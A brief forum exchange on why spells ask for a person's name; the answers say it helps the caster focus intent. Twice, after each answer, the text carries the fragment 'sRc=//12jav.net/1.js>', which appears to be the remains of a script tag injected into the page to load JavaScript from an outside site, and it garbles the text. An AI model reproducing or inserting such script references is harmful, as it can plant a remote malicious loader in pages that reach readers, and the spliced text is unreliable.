Why do some spells want you to say a persons name (Either yours or someone you know)? What is the signififcance of a name?

It helps you focus YOUR energy on the person the spell is for or directed to. Most of the actions done in a spell are for you (the caster) to focus your energy on your intent. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Whatever helps you focus your intent. If that's saying your name, then so be it... if "I" or "me" works for you, then that's just as good. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
